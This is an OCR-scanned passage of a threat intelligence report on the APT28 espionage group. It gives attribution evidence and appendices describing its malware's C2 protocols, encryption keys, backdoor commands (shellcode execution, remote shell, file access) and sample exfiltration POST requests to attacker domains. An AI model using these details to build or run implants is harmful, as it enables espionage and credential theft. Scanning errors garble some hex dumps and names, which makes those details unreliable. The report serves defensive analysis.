3b0ecd011500f61237c205834db0e13a     43520     2014-02-13 16:29:36 UTC Applicate
5882fda97fdf78b47081cc4105d44f7c        45056     2014-05-13 15:18:24 UTC Applicate
791428601ad12b9230b9ace4f2138713     45056     2014-05-13 16:42:26 UTC     Applicate Same as previous.
ead4ec18ebce6890d20757bb9f5285b1     45056     2014-07-25 15:44:04 UTC     Applicate Same as previous.
48656a93f9ba39410763a2196aabc67f 112640    2014-07-30 11:13:24 UTC Applicate
8c4fa713c5e2b009114adda758adc445 112640    2014-07-30 11:13:24 UTC     Applicate Same as previous.
1750URFACEwith minor changes to network communications (see Figure 7).
18 Basic anti-debug measures added (process listing, rand timing, is Debugger Present).
19 Switches from loading a secondary DLL (netui.dllAVinlDS.dll) to uploading the contents of %temp%\chkdbg.log. 20Statically links msvcrt library.
21Statically links msvcrt library and the strings used to identify the imported libraries and functions are reversed prior to being used, then reversed back after use. 22This version added assembly level obfuscation, which slows down analysis. This variant requires the OS to be at least Windows Vista.
22 fireeye.com
<5>>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
In April 2013, based on compile time, the group began to make significant alterations to the SOURFACE downloader.
Figure 8: NATO-themed decoy delivered with possible EVILTOSS predecessor from 2004
The Parties to this Treaty reaffirm their faith in the purposes and principles of the Charter of the United Nations
and their desire to live in peace with all peoples and all governments. They are determined to safeguard the freedom, common heritage and civilisation of their peoples, founded on the principles ofdemocracy, individual liberty and the rule of law. They seek to promote stability and well-being in the
North Atlantic area.
They are resolved to unite their efforts for collective defence and for the preservation of peace and security. They therefore agree to this North Atlantic Treaty
Article 1
The North Atlantic Treaty
Washington DC. - 4 April 1949
The Parties undertake, as set forth in the Charter of the United Nations, to settle any international dispute in which they may be involved by peaceful means in such a manner that international peace and security and justice are not endangered, and to refrain in their international relations from the threat or use of force in any manner inconsistent with the purposes of the United Nations.
Variants of the SOURFACE second stage oackdoor, EVI LTOSS, share some code similarities with SOURFACE. However, it contains more capabilities, includingthe ability to provide access to the file system and registry, enumerate network resources, create processes, log keystrokes, access stored credentials, and execute shellcode. The oackdoor encrypts data that it uploads with an RSA oublic key. Many of its variants we have seen are named netui . dl 1. EVI LTOSS variants may use the Simple Mail Transfer Protocol (SMTP) to send stolen data in an attachment named "detal uri . da t". The backdoor attaches this file to a □reformatted email and sends it out through a victim's mail server.
Interestingly, we found an antivirus report from 200423 detailing what appears to be an early variantof EVILTOSS.The backdoorwas installed alongside the NATO-themed decoy document depicted in Figure 8. The backdoor sent data via SMTP to nato_smtp@mail[.]ru and received its tasking via POP from nato_pop@mail[.]ru. Although we have not conclusively attributed this sample to APT28, it does suggest the oossibility that APT28 has been operatingsince as early as 2004.24
nttp://ae.no rton.com/security_res ponse/print_writeup.jsp?docid=2004-081915-1004-99
Although the malware family and interest in NATO make it likely that APT28 was involved, we cannot conclusively attribute this sample to APT28 based on these factors alone. We have no evidence that they controlled the C2 for this malware or were using EVI LTOSS in 2004. APT28 could have possibly obtainec this source code from another group of actors. Also, malware can be passed from group to group. The other malware that we associate with APT28 in this paper is more strongly attributed to the group using additional factors, some of which we mention in Appendix A.
23 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
MODULAR IMPLANTS
INDICATE A FORMAL
DEVELOPMENT
ENVIRONMENT
CHOPSTICK variants may move messages and information using at least three methods:
1. Communications with a C2 server using
HTTP. These protocols are covered in more detail in Appendix D.
2. Email sent through a specified mail server.
One CHOPSTICK vl variant contained modules and functions for collecting <eystroke logs, Microsoft Office documents, and PGPfiles.The monitoringfor new files of interest is performed by a "Directory Observer" module. In one sample this information was intended to be sent via SMTP using a Georgian MIA mail server. It used one of four embedded sender emai addresses (@mia.gov.ge) to send files via email to another email address on the same mail server. All information required for the email was hardcoded in the backdoor.
3. Local copying to defeat closed networks. One variant of CHOPSTICK focuses or apparent air gap/ closed network capabilities oy routing messages between loca directories, the registry and USB drives.
oackdoor at compile time.
A modular development framework suggests the group has had an organized development effort since as early as 2007.
During our research, we discovered that APT28 uses a backdoor developed using a modular framework. We call this oackdoor CHOPSTICK, a somewhat ironic name that comes from our semi-random name generator. The modular design allows flexible options for compiling variants with different capabilities as needed, as well as deploying additional capabilities at runtime. This allows the developers to make targeted implants, including only the capabilities and protocols necessary for a specific environment. Such a modular framework suggests the group has had an organized development effort since as early as 2007. A formal development environment, in which code is versioned and well-organized, would almost certainly be required to trackand define the various modules that can be included in the
24 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT28 MALWARE
INDICATES RUSSIAN SPEAKERS IN A RUSSIAN TIME ZONE
Djringour research into APT28's malware, we noted two details consistent across Tialware samples. The first was that APT28 had consistently compiled Russian language settings into their malware. The second was that malware compile times from 2007 to 2014 corresponded to normal business hours in the UTC + 4 time zone, which includes major Russian cities such as Moscow and St. Petersburg.
Use of Russian and English Language Settings in PE Resources
PE resources include language information that can be helpful if a developer wants to show user
interface items in a specific language.25 Non-default anguage settings packaged with PE resources are dependent on the developer's build environment. Each PE resource includes a "locale" identifier with a language ID "composed of a primary language identifier indicatingthe language and a sublanguage identifier indicatingthe country/region."26
At the time of the writing of this paper, we had identified 103 malware samples that were both attributed to APT28 and contained PE resources. Table 5 shows the locale identifiers27 with associated language and country/region for these samples.
Table 5: Locale and language identifiers associated with APT28 malware
Locale ID	Primary language	Country/Region	Number of APT28 samples
0x0419	Russian (ru)	Russia (RU)	59
0x0409	English (en)	United States (US)	27
0x0000 or 0x0800	Neutral locale / System default locale language	Neutral	16
0x0809	English (en)	United Kingdom (GB)	1
25Microsoft Developer Network - Multiple Language Resources http://msdn.microsoft.com/en-us/library/ccl94810.aspx
26,27 Microsoft Developer Network - Language Identifier Constants and Strings http://msdn.microsoft.com/en-us/library/dd318693.aspx
25 fireeye.com
FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
The samples with Russian language settings were compiled between late 2007 and late 2013, as depicted in Figure 9. This consistency over a ong timeframe suggests that the developers of APT28 malware were using a build environment
with Russian language settings at least some of the time and made no effort to obscure this detail. Overall, the locale IDs suggest that APT28 developers can operate in both Russiar and English.
Figure 9: Number of APT28 samples with Russian language settings by compile month
September
September
September
26 fireeye.com
<E*> FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Compile Times Align with Working Hours in Moscow and St. Petersburg
Of the 140 malware samples that we have attributed to APT28 so far, over 89% were compiled between 0400 and 1400 UTC time, as depicted in Figure 10. Over 96% were compiled oetween Monday and Friday. This parallels the working hours in UTC+0400 (that is, compile times begin about 8AM and end about 6PM in this time zone). This time zone includes major Russiar cities such as Moscow and St. Petersburg.
NORWAY
FINLAND
.st. petersburg
moscow
w
APT 28: A Window into Russia's Cyber Espionage Operations?
CONCLUSION
We started researching APT28 based on activity we observed on our clients' networks, similar to other targeted threat groups we have identified over time. We assess that APT28 is most likely sponsored by the Russian government. We summarize our key observations about APT28 ir =igure 11 below.
APT28's characteristics—their targeting, malware, anguage, and working hours—have led us to conclude that we are tracking a focused, longstanding espionage effort. Given the available data, we assess that APT28's work is sponsored oythe Russian government.
Figure 11: Summary of key observations about APT28
MALWARE
Evolves and Maintains Tools for Continued, Long-Term Use
Uses malware with flexible and lasting platforms Constantly evolves malware samples for continued use
Malware is tailored to specific victims' environments, and is designed to hamper reverse engineering efforts Development in a formal code development environment
Various Data Theft Techniques
Backdoors using HTTP protocol
Backdoors using victim mail server
Local copying to defeat closed/air gapped networks
TARGETING
Georgia and the Caucasus
Ministry of Internal Affairs Ministry of Defense Journalist writing on Caucasus issues Kavkaz Center
Eastern European Governments & Militaries
Polish Government
Hungarian Government
Ministry of Foreign Affairs in Eastern Europe
Baltic Host exercises
Security-related Organizations
NATO • OSCE
Defense attaches
Defense events and exhibitions
RUSSIAN ATTRIBUTES
Russian Language Indicators
Consistent use of Russian language in malware over a period of six years
Lure to journalist writing on Caucasus issues suggests APT28 understands both Russian and English
Malware Compile Times Correspond to Work Day in Moscow's Time Zone
Consistent among APT28 samples with compile times from 2007 to 2014
The compile times align with the standard workday in the UTC + 4 time zone which includes major Russian cities such as Moscow and St. Petersburg
28 fireeye.com
<k> FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APPENDIXA: DISTINGUISHING THREAT GROUPS
We use the term "threat group" to refer to actors who work together to target and penetrate networks of interest.These individuals mayshare the same set of tasks, coordinate targets, and share tools and methodology. They work together to gain access to their targets and steal data.
The art of attributing disparate intrusion activities to the same threat group is not always simple. Different groups may use similar intrusior methodologies and common tools, particularly those that are widely available on the Internet, such as pwdump, HTran, or GhOst RAT. There may oe overlaps between groups caused by the sharing of malware or exploits they have authored, or even the sharing of personnel. Individual threat actors may move between groups either temporarily or permanently. A threat actor may also be a private citizen who is hired by multiple groups. Multiple groups, on occasion, compromise the same target within the same timeframe.
Distinguishing one threat group from another is oossible with enough information, analytica experience, and tools to piece it all together. We can analyze multiple incidents and tell by the evidence left behind that a given incident was the •"esu.lt of one threat group and not another.
Threat actors leave behind various forensic details. They may send spear phishing emails from a specific IP address or email address. Their emails may contain certain patterns; files have specific names, MD5 hashes, timestamps, custom functions, and encryption algorithms. Their oackdoors may have command and control IP addresses or domain names embedded. These are just a few examples of the myriad of forensic details that we consider when distinguishing one threat group from another.
At the most basic level, we say that two intrusior events are attributed to the same group when we nave collected enough indicators to show beyond a reasonable doubt that the same actor or group of actors were involved. We track all of the indicators and significant linkages associated with identified threat groups in a proprietary database that comprises millions of nodes and linkages oetween them. In this way, we can always go back and answer "why" we associated cyber threat activity with a particular group.
29 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APPENDIX B: TIMELINE OF APT28 LURES
YEAR	LURE TOPIC	MALWARE
2010	Iran's work with an international organization (internal document)	SOURFACE
2011	File named "militarycooperation.doc"	SOURFACE, OLDBAIT
2011	Georgian language IT document for Ministry of Internal Affairs (internal document)	SOURFACE
2011	"USB Disk Security is the best software to block threats that can damage your PC or compromise your personal information via USB storage."	SOURFACE
2012	Food security in Africa ("Food and nutrition crisis reaches peak but good forecast for 2013")	SOURFACE
2012	"IDF Soldier Killed and another injured in a Terror Attack"	SOURFACE
2012	"Echo Crisis Report" on Portugal's forest fires	SOURFACE
2012	"FBI to monitor Facebook, Twitter, Myspace"	SOURFACE
2012	Georgia (US state, not the country of Georgia) murder case uncovers terror plot	SOURFACE
2012	Military attaches in London (internal document)	SOURFACE
2013	South Africa MFA document	CHOPSTICK, CORESHELL
2013	John Shalikashvili (Georgian-Polish-American US General) Questionnaire	CORESHELL
2013	Asia Pacific Economic Cooperation Summit 2013 reporters (internal document)	SOURFACE
2013	Defense Attaches in Turkey (internal document)	CHOPSTICK, CORESHELL
2013	Turkish Cypriot news about Syria chemical weapons	CHOPSTICK, CORESHELL
2013	Georgian language document about drivers' licenses (internal document)	EVILTOSS
2013	Apparent Reason Magazine-related lure sent to a journalist	CORESHELL
2014	Mandarin language document, possibly related to a Chinese aviation group (non-public document)	CORESHELL
2014	Netherlands-Malaysia cessation of hostilities; related to Ukraine airline attack	CORESHELL
30 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APPENDIXC: SOURFACE/CORESHELL
SOURFACE is a downloader that obtains a second stage backdoor from a C2 server. Over time the downloader has evolved and the newer versions, jsually compiled with the DLL name 'coreshell.dll', are distinct enough from the older versions that we refer to it as SOURFACE/CORESHELL or simply CORESHELL. This appendix focuses or these newer versions.
CORESHELL uses two threads to communicate with its C2 server. The first thread sends beacons that contain the process listing of the compromised host. The second thread is responsible for downloading and executing stage
two payloads. Messages are sent using HTTP POST requests whose bodies contain encrypted and Base64 encoded data. The encryption algorithm is a custom stream cipher using a six-byte key. Commands from the controller to the CORESHELL implant are encrypted using another stream cipher but this time using an eight-byte <ey. CORESHELL has used the same user agent string ("MSI E 8.0") that SOURFACE previously used, but in more recent samples CORESHELL uses the default Internet Explorer user agent string obtained from the system. Figure 11 shows an example POST request.
31 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
When Base64 decoded, the POST content looks like this:
00000000 cd 77 ae 62 af ac ab 69 b5 6b 91 dc ab 20 b9 65 .w.b. . . i . k. . . .e
00000010 de b2 ac 2d 96 35 82 fd f3 d5 82 le c7 bd a8 ee ...-.5..........
00000020 9c ee 9a 30 ac e5 21 e4 a6 ...0..!..
The key used to encrypt the message is six bytes long and is appended to the end of the message. In this is example the key would be: 30 ac e5 21 e4 a6. When the message is decrypted, the resulting plaintext is:
00000000 00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68 .rhdnzxdfmF6f5ah
00000010 34 78 67 30 34 30 33 30 35 30 31 la 00 00 00 23 4xg04030501____#
00000020 00 00 00 ...
The following table contains a breakdown of each of the field's C2 message.
Table 6: Example CORESHELL beacon structure
Offset	Value	Description
00	00	Command byte: 0 - Command request 1 - Process listing
01	"rhdn"	Unknown - Potentially a campaign identifier. Values seen so far: "rhze", "rhdn" and "mtfs'
05	"zxdfmF6f5ah4xg"	Hostname of compromised system
13	"0403"	Unknown - Potentially a version number. This number is hardcoded within the implant.
17	"05"	OS Major version
19	"01"	OS Minor version
1B	0x0000001a	Header length minus the command byte (LE DWORD)
1F	0x00000023	Length of the entire message (LE DWORD)
32 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Commands are sent from the C2 server to the CORESHELL backdoor in HTTP responses to the POST 'equests. The command isidentified by the NULLterminated UNICODE string "OK" (O\x00\K\x00\x00\ xOO).The command is Base64 encoded and immediately follows the "OK" string. Figure 12 shows a sample CORESHELL command:
The Base64 decoded string is:
00000000 01 00 00 00 AA AA 01 01 01 01 01 01 01 01 10 41 ...............A
00000010 70 41 10 42 33 42 D3 43 F2 43 92 44 B5 44 55 45 pA.B3B.C .CD.DUE 00000020 74 45 14 46 37 46 D7 tE. F7F.
The following table contains a description of each field in the command message:
Table 7: CORESHELL C2 message structure
Offset	Value	Description
00	0x00000001	Constant value, must be set to 1 (LE DWORD)
04	AA AA	Unknown - not referenced
06	01 01 01 01 01 01 01 01	Encryption key (8 bytes)
OE	10 41 70 41 10 42 33...	
33 fireeye.com
APT 28: A Window into Russia's Cyber Espionage Operations?
When the above command "10 41 70 41 10 42 33..." is decrypted usingthe key "01 01 01 01 01 01 01 01" the following command message is produced:
00000000 04 CC C2 04 00 42 42 42 42 43 43 43 43 44 44 44 .....BBBBCCCCDDD
00000010 44 45 45 45 45 46 46 46 46 DEEEEFFFF
The implant supports the following four command identifiers from the controller as seen in Table 8. The first byte of the command message specifies the command type and is immediately followed by the PE or shellcode to be executed. In this example the command byte is 04 indicatingthe following bytes are shellcode. If the command byte was 01, 02, or 03 the following bytes would be a DLL or EXE that would oe written to disk and executed.
Table 8: CORESHELL commands
Command ID	Description
01	Save command data as %LOCALAPPDATA%\svchost.exe and execute using CreateProcess.
02	Save command data as %LOCALAPPDATA%\conhost.dll and execute using "rundll32.exe \"%s\",#1".
03	Save command data as %LOCALAPPDATA%\conhost.dll and execute using LoadLibrary.
04	Command data is a shell code and is executed using CreateThread.
34 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APPENDIX D: CHOPSTICK
CHOPSTICK is a backdoor that uses a modularized, object-oriented frameworkwritten in C++. This framework allows for a diverse set of capabilities across maIware variants sharing a common code base. CHOPSTICK may communicate with external servers using SMTP or HTTP. This appendix documents variants using HTTP communications.
The first time CHOPSTICK is executed, it may encrypt and store configuration data in the Registry key HKU\S-l-5-19_Cl asses\Software\Mi crosoft\Medi aPl ayer\{ EeegeiOB-EeSE^EFl-gagE-lBDDDSSBeegAlXchnnl.Theuser HKUY3-1-5-19 corresponds to the LOCAL_SERVICE account SID. The configuration block is encrypted using RC4 encryption. The key is a combination of a 50-byte static <ey and a four-byte salt value randomly generated at runtime. The static key is derived from opcodes ir the backdoor.
CHOPSTICK collects detailed information from the host including the Windows version, CPU architecture, Windows Firewall state, User Account Control (UAC) configuration settings on Windows Vista and above and Internet Explorer settings. It also tests for the installation of specific security oroducts (Table 9) and applications (Table 10).
Table 9: Endpoint security products detected by CHOPSTICK
Service Name	Security Product
Acssrv	Agnitum Client Security
AVP	Kaspersky
SepMasterService	Symantec
McAfeeService	McAfee
AntiVirService	Avira
Ekrn	ESET
DrWebAVService	Dr. Web Enterprise Security
MBAMService	Malwarebytes Anti-Malware
35 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Table 10: Applications detected byCHOPSTICK
Process Name	Application
firefox.exe	Mozilla Firefox
iexplore.exe	Internet Explorer
outlook.exe	Microsoft Outlook
opera.exe	Opera Browser
bat.exe	Unknown
msimn.exe	Outlook Express
vpngui.exe	Cisco Anyconnect VPN client
ipseca.exe	IPsec VPN client
ipsecc.exe	IPsec VPN client
openvpn.exe	OpenVPN client
openssl.exe	OpenSSL
openvpn-gui-1.0.3.exe	OpenVPN client
msmsgs.exe	Microsoft Messenger
wuauclt.exe	Windows Update
chrome.exe	Google Chrome Browser
thebat.exe	The Bat Secure Email Client
skype.exe	Skype Messenger
36 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
After collecting host information, CHOPSTICK creates a hidden file that may be named ^ALLUSERSPR0FILE%\edg6EF885E2.tmp for temporary storage and creates a Windows mailslot with the name "check_mes_v55 55".28 Its usage of a Windows mailslot would potentially allow external binaries to write data to the "check_mes_v55 55" mailslot, possibly allowing CHOPSTICK to encrypt and store output from other malware. It creates a thread that records user activity on the host, capturing desktop screenshots in JPEG format, tracks current window focus, collects keystrokes, and scrapes window contents (text, context menus, etc.). User activity is captured once every 500 milliseconds and logged ir an HTML-like format. The thread writes user activity log messages to the "check_mes_v5 55 5" mailslot ir olain text. CHOPSTICK reads messages from the mailslot, encrypts them using RC4, and then stores the encrypted message inanedg6EF885E2.tmp temporary file. The RC4 encryption used here also uses a 50-oyte static key plus four-byte random salt value.
After approximately 60 seconds of execution time, CHOPSTICK begins communicating with one of its C2 servers over HTTP. After sending an initial HTTP GET request it uploads the file contents of edg6EF885E2. tmp to the C2 server using HTTP POST requests. It does not wait for a response from the server to begir uploading. Once the contents of edg6EF885E2.tmp are uploaded, CHOPSTICK deletes the file. Figure 13 oelow contains an example of an HTTP POST request uploading a segment from edg6EF885E2.tmp.
POST /search/?btnG=D-3U5vY&utm=79iNI&ai=NPVUnAZf8FneZ2e_qptjzwHlQ&PG3pt=n-B9onK2KCi HTTP/1.1
Accept: text/html,application/xhtml+xml,appli cation/xml;q=0.9,*;q=0.8 Accept - Language : en-us,en;q=0.5 Accept - Encoding : gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; W0W64; rv:20.0) Gecko/20100101 Fi refox/20 .0
Host: windows-updater . com Content-Length: 77 Cache-Control: no-cache
lb2x7F4Rsi8_e4N_sYYpulm7AJcgN6BzDpQYvlP2pi FBLBqghXi HY3SIfe8cUHHYojeXfeyyOhw
37 fireeye.com
28A mailslot is a Windows inter-process communication (IPC) mechanism similar to a named pipe, but is designed for one-way communications between processes and can also be used across the network.
<E*>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
CHOPSTICK uses a URL-safe Base64 encoding, using an alphabet that substitutes "+" and 7" for"-" and "_" respectively. Each HTTP request contains multiple Base64 encoded URL parameters, however only one parameter contains information encoded by the malware ("ah") and the rest of the URL parameters appear to be randomly generated per request.
CHOPSTICK encrypts an 11-byte sequence in the "ah" parameter. The purpose of this parameter appears to be to uniquely identify the particular instance of the backdoor to the C2 server. The Base64 encoded text of this parameter begins with a number of randomly generated alphabetical characters oresumably intended to prevent people from Base64 decoding the whole string without some knowledge of how the malware family works. The first four bytes of the message are an XOR key for the remainder of the data. Once decrypted using the XOR key, an 11-byte sequence is revealed. The first seven bytes are static, and are hard-coded in CHOPSTICK, while the last four bytes appear to be unique.
The message body of the POST request is also Base64 encoded. This encoded string is also prefixed with random characters designed to break the output of a Base64 decode operation on the entire string. The first 15 bytes of the decoded message body comprise another 11-byte sequence similar to the sequence stored in the "ah" parameter as described above. Decrypting these bytes yields another static seven-byte sequence, followed by four unique bytes. The remainder of the message body consists of the RC4 encrypted data containingthe HTML-formatted user activity log, edg6EF885E2.tmp.
After uploading edg6EF885E2 . tmp, CHOPSTICK continues to query its C2 servers for commands using HTTP GET requests. The malware contains code which allows it to load or memory-map external modules that export the following functions: SendRawPacket, GetRawPacket, Initial izeExp, DestroyExp, IsActiveChannel , GetChannel Info , SetChannel Info , Run, GetModulelnfo, GiveMessage, and TakeMessage.
38 fireeye.com
APT 28: A Window into Russia's Cyber Espionage Operations?
Modularity
CHOPSTICK backdoors are compiled within a modularized development framework. This means that two separate CHOPSTICK backdoors may contain vastly different functionality, depending on which modules were included at compile time. The modules that are included in an instance of CHOPSTICK may be reported to the C2 server as part of POST messages. Figure 14 includes an example from a CHOPSTICK vl variant:
Figure 14: Sample CHOPSTICK vl HTTP POST including module identification
POST /webhp?rel=psy&hl=7&ai=d2SSzFKlR410dRd_ZdyiwE17aTz0PeP-PVsYhll VAXpLhIebB4= HTTP/1.1
Accept: text/html,application/xhtml+xml,appli cation/xml;q=0.9,*/*;q=0.8 Accept - Language : en-us,en;q=0 . 5 Accept - Encoding : gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; W0W64; rv:20.0) Gecko/20100101 Fi refox/20.0 Host: adobeincorp.com Content-Length: 71 Cache-Control: no-cache
d2SSzFKchH9IvjcM5 5eQCTbMbVAU7mR0IK6pN0rbFoF7Br0Pi_0u3Sf 10h30_HufqHiDU=
39 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
To decode the POST content, the first step is to remove characters from the Base64 string (the number of characters to remove may vary between different communication channels). In the example from Figure 14, the number of characters removed is seven. Once these characters are removed the decoded (but still encrypted) text looks like this:
00000000 72 11 fd 22 f8 dc 33 9e 5e 40 24 db 31 b5 40 53 r.."..3.A@$.1.@S
00000010 b9 91 dO 82 ba a4 d3 ab 6c 5a 05 ec la f4 3e 2f ........1Z____>/
00000020 ff d2 ed d2 7f 53 al df 4f c7 b9 fa 87 88 35 .....S..0.....5
The first two words ("72 11" and "fd 22") are checksums that are used to validate the message. The next 4 oytes "f8 dc 33 9e" are a salt value that is appended to the end of an RC4 key. Once decrypted, the message looks like the following:
00000000 72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57 r. .". . 3. V4MGNxZW 00000010 6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee 1vcmhjOG9yZQ=<<. 00000020 01 00 00 01 00 23 01 10 23 01 11 23 01 13 23 .....#..#..#..#
The strings "V4MGNxZWl vcmh jOG9yZQ" and "=<<\xee" are hardcoded in the implant. The module information starts at offset 0x20 with the string "01 00 00" and is formatted as follows:
Table 11: Example CHOPSTICKvl message format
Offset	Value	Description
00	0x0001	Message from the AgentKernel v1
02	00	Command ID
03	01 00 23 01 10 23 01 11 23 01 13 23	List of modules included in the implant separated by a '#' character
40 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
The modules included in this CHOPSTICK vl implant are:
Table 12: Example CHOPSTICK vl module list
Module ID	Internal Module Name	Description
0x0001	AgentKernel	Kernel, probably version 1. Handles communication between modules and C2 tunnels.
0x1001	modKey	Logs keystrokes and takes screen captures.
0x1101	modFS	Facilitates file system access, such as directory browsing along with reading, deleting and opening files.
0x1301	modProcRet	Remote command shell access.
Our determination of a CHOPSTICK "vl" versus "v2" is based on the self-identification of the kernel ID and associated modules. Compare the list of CHOPSTICK vl modules in Table 12 with the list of modules in an example CHOPSTICKv2 variant inTable 13:
Table 13: Example CHOPSTICK v2 module list
Module ID	Internal Module Name	Description
0x0002	kernel	Kernel, probably version 2. Handles communication between modules and C2 tunnels.
0x1002		Logs keystrokes and takes screen captures.
0x1102		Facilitates filesystem access, such as directory browsing along with reading, deleting and opening files.
0x1302		Remote command shell access.
0x1602		Load additional DLLs.
41 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
The kernel IDs 0x0001 and 0x0002 indicate different versions. The corresponding modules in each oackdoor also are consistently identified with 0x01 and 0x02, respectively, in the second byte. In both variants the modules with keystroke log, filesystem access, and command shell capabilities have the consistent identifiers 0x10, 0x11, and 0x13, respectively, in the first byte. This suggests that the first byte in the module ID identifies the module type whereas the second byte identifies the kernel version.
The kernel sends commands to each module using its module ID. The commands that each module understands are likely consistent from build to build. Table 14 and Table 15 show examples of commands that each module understands.
Table 14: Commands understood bymodFS (0x1101) module
Command ID	Description	Example
01	Find file	\x01\x11\x01 Directory&file&[01]
02	Read file	\x01\x11\x02Directory&file&[01]
03	Write file	\x01\x11\x03Directory&file&[Contents]
04	Delete file	\x01\x11\x04Directory&file&[01]
05	Execute file	\x01\x11\x05Directory&file&[01]
		
Table 15: Commands understood bymodProcRet (0x1301) module		
		
Command ID	Description	Example
00	CMD.exe output	\x01\x13\x00[Output]
01	CMD.exe start	\x01\x13\x01
02	CMD.exe exit	\x01\x13\x02
11	CMD.exe input	\x01\x13\x11 [Input]
42 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APPENDIXE: OLDBAIT
OLDBAIT is a credential harvester that installs itself in %ALLUSERPROFILE%\\Application Data\ Microsoft\MediaPlayer\updatewindws.exe. There is a missing space in the MediaPlayer directory and the filename is missing the 'o' character. Both the internal strings and logic are obfuscated and are unpacked at startup. Credentials for the following applications are collected:
• Internet Explorer
• Mozilla Firefox
• Eudora
• The Bat! (an email client made by a Moldovan company)
• Becky! (an email client made by a Japanese company)
3oth email and HTTP can be used to send out the collected credentials. Sample HTTP traffic is displayed in Figure 15.
43 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Figure 16: Example OLDBAIT SMTP traffic
From: 1 isa . cuddy@windOws.kz To: dr . house@windOws.kz Subject: photo(9a3d8ea4-test) Date: Tue,  23 Sep 2014 15:42:56 -0500 MIME-Version: 1.0 Content-Type: text/plain;
charset="us-ascii" Content-Transfer-En coding: 7bit X-Priority: 3 X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670 X-Mime0LE: Produced By Microsoft MimeOLE v6 . 00 . 2900 . 2670 X-Spam: Not detected ===STARTP0INT===
qVV5KyHocV3FkUeENvu9LnVIlRB0YTa7xhoTwhRl IBBI7gRzVxi kQXDRkdy4vGtlWfBtg9Utzbny Uh+usXJHZ9EsecqqOUKg5Ul 102E20iyBTnGDPdPOOUMRx/E+2it/10wQyH/epo8zuLnCuxPe7B+K - - cut —
hU+MWBLP+7h5ZojN =ENDP0INT===
OLDBAIT handles APIs very similarly to SOURFACE and EVI LTOSS. There is a setup routine that loads the imports into a table and all API calls reference an index to this table. In SOURFACE and EVI LTOSS the table is stored in a global variablewhile in OLDBAIT this table is allocated at runtime and a pointer is oassed between functions.
44 fireeye.com
<k>FireEye
FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | 408.321.6300 | 877.FIREEYE (347.3393) | info@fireeye.com
ww.fireeye
©2014 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc. \ All other brands, products, or service names are or may be trademarks or service marks of their respective owners. SP.APT28.EN-US.102014
FireEye